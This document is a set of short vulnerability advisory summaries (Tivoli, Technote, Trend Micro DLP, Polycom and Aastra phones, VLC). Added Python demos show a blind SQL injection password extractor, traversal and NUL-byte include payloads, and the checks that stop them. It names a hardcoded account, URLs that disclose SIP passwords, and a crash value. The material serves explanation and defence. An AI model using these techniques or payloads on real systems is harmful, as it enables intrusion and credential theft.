This module exploits a stack-based buffer overflow in the way IBM Tivoli Endpoint Manager versions 3.7.1, 4.1, 4.1.1 and 4.3.1 handle long POST query arguments. The issue is triggered by sending a specially crafted HTTP POST request to the service (lcfd.exe) listening on TCP port 9495. Triggering it requires authorization, so the module makes use of a second vulnerability: a hardcoded account (tivoli/boss) is used to bypass the authorization check.
A blind SQL injection vulnerability exists in Technote 7.2 and lower when running on MySQL 3.x and higher. An attacker controls the order of the returned rows through the sort variable by injecting a 'case' statement, so that the rows come back sorted either by the 'no' column or by the 'uid' column depending on a condition of the attacker's choosing; the observed order leaks one bit per request. The exploit is written in Python and uses the 'lpad' and 'ascii' functions to extract the 'm_pass' column of the 'a_tn3_memberboard_list' table one character at a time.
A directory traversal vulnerability in Trend Micro Data Loss Prevention Virtual Appliance 5.5 can be exploited to read files outside of the web root by sending a specially crafted request to the vulnerable server.
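The ORDER BY oracle described above, as an added illustration that is not the Technote exploit itself: the vulnerable query concatenates the sort variable into ORDER BY, the injected CASE makes the row order depend on a condition, and a binary search over that one-bit oracle recovers 'm_pass'. It runs against a constructed in-memory SQLite table (table and column names follow the advisory, the rows are made up), with SQLite's unicode() standing in for MySQL's ascii(); the whitelist in safe_list is the fix a practitioner would apply, since ORDER BY cannot be parameterised.

```python
"""Blind SQL injection via an ORDER BY CASE oracle (constructed demo)."""
import sqlite3

# Constructed data; names mirror the advisory, values are invented.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE a_tn3_memberboard_list (no INTEGER, uid TEXT, m_pass TEXT);
INSERT INTO a_tn3_memberboard_list VALUES (1, 'zed',   'hunter2');
INSERT INTO a_tn3_memberboard_list VALUES (2, 'admin', 'secret');
""")


def vulnerable_list(sort: str) -> list:
    """Simulates the flaw: the sort variable is concatenated into ORDER BY."""
    return conn.execute(
        f"SELECT no, uid FROM a_tn3_memberboard_list ORDER BY {sort}"
    ).fetchall()


def oracle(cond: str) -> bool:
    """True when cond holds: rows then sort by 'no' and 'zed' comes first;
    otherwise they sort by 'uid' and 'admin' comes first."""
    rows = vulnerable_list(f"CASE WHEN ({cond}) THEN no ELSE uid END")
    return rows[0][1] == "zed"


def binary_search(expr: str, lo: int, hi: int) -> int:
    """Find the integer value of expr in [lo, hi] using 'expr > mid' probes."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def subquery(col: str, target_uid: str) -> str:
    return f"(SELECT {col} FROM a_tn3_memberboard_list WHERE uid = '{target_uid}')"


def extract_password(target_uid: str) -> str:
    """Recover m_pass for target_uid, one character per binary search.
    MySQL would use ascii(substr(m_pass, i, 1)); SQLite spells it unicode()."""
    length = binary_search(subquery("length(m_pass)", target_uid), 0, 64)
    chars = []
    for i in range(1, length + 1):
        code = binary_search(
            subquery(f"unicode(substr(m_pass, {i}, 1))", target_uid), 32, 126)
        chars.append(chr(code))
    return "".join(chars)


ALLOWED_SORT = {"no", "uid"}


def safe_list(sort: str) -> list:
    """Fix: only a whitelisted column name may reach ORDER BY."""
    if sort not in ALLOWED_SORT:
        raise ValueError(f"unsupported sort column: {sort!r}")
    return conn.execute(
        f"SELECT no, uid FROM a_tn3_memberboard_list ORDER BY {sort}"
    ).fetchall()


if __name__ == "__main__":
    print(extract_password("admin"))
```

Each probe costs one request, so a 6-character password in the printable range takes about 6 * 7 + 7 requests; the 'lpad' in the original exploit only normalises the compared values and does not change the oracle.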
A directory traversal vulnerability in Tele Data Contact Management Server can be exploited to read files outside of the web root.
A local file inclusion vulnerability in Angora Guestbook 1.5 can be exploited to include arbitrary files. The proof of concept is a URL that includes a path to the Windows win.ini file.
Pacer Edition CMS suffers from a local file inclusion vulnerability: input passed through the 'l' parameter to the admin/login/forgot/index.php script is not properly verified before being used to include files. This can be exploited to include arbitrary local files by combining directory traversal sequences with URL-encoded NULL bytes.
A data disclosure vulnerability exists in the 'Lines' -> 'Line 1' section of the Polycom IP Phone web interface. It allows an attacker to disclose the password of the SIP account configured for the connected phone line. To exploit it, access the phone at 'http://address/reg_1.htm' and view the page source: the 'reg.1.auth.password' field contains the password the phone uses to authenticate that username to the SIP server.
A data disclosure vulnerability exists in the 'Global SIP' / 'Line 1' section of the Aastra IP Phone web interface. It allows an attacker to disclose the password of the SIP account configured for the connected phone line. To exploit it, access the phone at 'http://address/globalSIPsettings.html', or at 'http://address/SIPsettingsLine1.html', which shows the Caller ID, Authentication Name and Password, and view the page source: the 'password' field contains the password the phone uses to authenticate that username to the SIP server. With the SIP server address, username and password, an attacker can register with the SIP server and make calls.
A SQL injection vulnerability exists in the 'id' parameter of the 'section.asp' page, which can be exploited to inject malicious SQL queries. An attacker can use it to gain access to the database and extract sensitive information.
The VLC XSPF playlist demuxer (Demuxers: Playlist) reads a <vlc:id></vlc:id> tag that accepts a decimal value. A value large enough to point beyond the memory segment allocated for program data crashes the program: setting <vlc:id> to 1073741823, e.g. <vlc:id>1073741823</vlc:id>, results in a memory access violation and the application crashes. The vulnerable code lives in the module libplaylist_plugin.dll; once the value is used to reach an address that is not mapped, the result is a denial of service condition.
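The traversal and NULL-byte tricks used in the four advisories above (Trend Micro DLP, Tele Data, Angora Guestbook, Pacer Edition CMS), shown beside the check that defeats them, as an added Python illustration that is not code from any of those products. The base directory, file names and request values are constructed for the demo; the parameter is called 'l' after the Pacer Edition CMS advisory.

```python
"""Validating a user-supplied include path (constructed demo)."""
import os
import tempfile
from urllib.parse import unquote


def resolve_include(base_dir: str, user_path: str) -> str:
    """Return the real path of user_path under base_dir or raise ValueError.

    user_path is the raw, still URL-encoded value of a parameter such as 'l'.
    """
    decoded = unquote(user_path)
    # %00 decodes to a NUL; a C-based runtime would truncate the string there,
    # so a suffix the application appends (e.g. '.php') silently disappears.
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    if os.path.isabs(decoded):
        raise ValueError("absolute path")
    root = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(root, decoded))
    # realpath collapses '..' and symlinks; commonpath (not startswith) makes
    # sure 'lang_evil' is not accepted as living under 'lang'.
    if os.path.commonpath([root, target]) != root:
        raise ValueError("path escapes the include directory")
    return target


# Constructed requests: one legitimate, three hostile.
REQUESTS = [
    "lang/en.php",
    "lang/../../../../etc/passwd",
    "..%2F..%2F..%2Fwindows%2Fwin.ini%00",
    "/etc/passwd",
]


def demo() -> dict:
    """Build a throwaway include directory and run each request through the
    check; returns request -> 'ok' or the rejection reason."""
    base = tempfile.mkdtemp()
    os.makedirs(os.path.join(base, "lang"))
    with open(os.path.join(base, "lang", "en.php"), "w") as fh:
        fh.write("<?php // constructed language file\n")
    verdicts = {}
    for req in REQUESTS:
        try:
            resolve_include(base, req)
            verdicts[req] = "ok"
        except ValueError as exc:
            verdicts[req] = str(exc)
    return verdicts


if __name__ == "__main__":
    for req, verdict in demo().items():
        print(f"{req!r:45} {verdict}")
```

Decode once, reject NUL and absolute paths, then compare canonical paths; a denylist of "../" strings would miss encoded or mixed-separator variants, which is why the check works on the resolved path instead.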
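The bounds check the XSPF demuxer lacked, as an added Python illustration that is not VLC code: it parses the <vlc:id> elements of a playlist and reports any value that could not be a valid index into the track array (negative, non-numeric, or not less than the number of tracks). The playlist below is constructed; the namespace URIs are the ones VLC writes into its own playlists, and 1073741823 is the crashing value from the advisory.

```python
"""Reject out-of-range <vlc:id> values before using them as an index."""
import xml.etree.ElementTree as ET

XSPF_NS = "http://xspf.org/ns/0/"
VLC_NS = "http://www.videolan.org/vlc/playlist/ns/0/"

# Constructed sample; the second track carries the crashing id.
SAMPLE_XSPF = f"""
<playlist xmlns="{XSPF_NS}" xmlns:vlc="{VLC_NS}" version="1">
  <title>Playlist</title>
  <trackList>
    <track>
      <location>file:///tmp/a.mp3</location>
      <extension application="http://www.videolan.org/vlc/playlist/0">
        <vlc:id>0</vlc:id>
      </extension>
    </track>
    <track>
      <location>file:///tmp/b.mp3</location>
      <extension application="http://www.videolan.org/vlc/playlist/0">
        <vlc:id>1073741823</vlc:id>
      </extension>
    </track>
  </trackList>
</playlist>
""".strip()


def tracks(xspf_text: str) -> list:
    root = ET.fromstring(xspf_text)
    return root.findall(f"{{{XSPF_NS}}}trackList/{{{XSPF_NS}}}track")


def count_tracks(xspf_text: str) -> int:
    return len(tracks(xspf_text))


def vlc_ids(xspf_text: str) -> list:
    """Raw text of every <vlc:id> in document order."""
    ids = []
    for track in tracks(xspf_text):
        for elem in track.findall(f"{{{XSPF_NS}}}extension/{{{VLC_NS}}}id"):
            ids.append((elem.text or "").strip())
    return ids


def check_vlc_ids(xspf_text: str) -> list:
    """Return the raw id values that may not be used as an array index.

    A valid id is a base-10 integer with 0 <= id < number of tracks; anything
    else (1073741823 in the sample, negatives, garbage) is reported.
    """
    ntracks = count_tracks(xspf_text)
    bad = []
    for raw in vlc_ids(xspf_text):
        try:
            value = int(raw, 10)
        except ValueError:
            bad.append(raw)
            continue
        if not 0 <= value < ntracks:
            bad.append(raw)
    return bad


if __name__ == "__main__":
    print("rejected ids:", check_vlc_ids(SAMPLE_XSPF))
```

The array the id indexes is only as long as the track list, so that count is the natural upper bound; a check against the integer width alone would still let 1073741823 through.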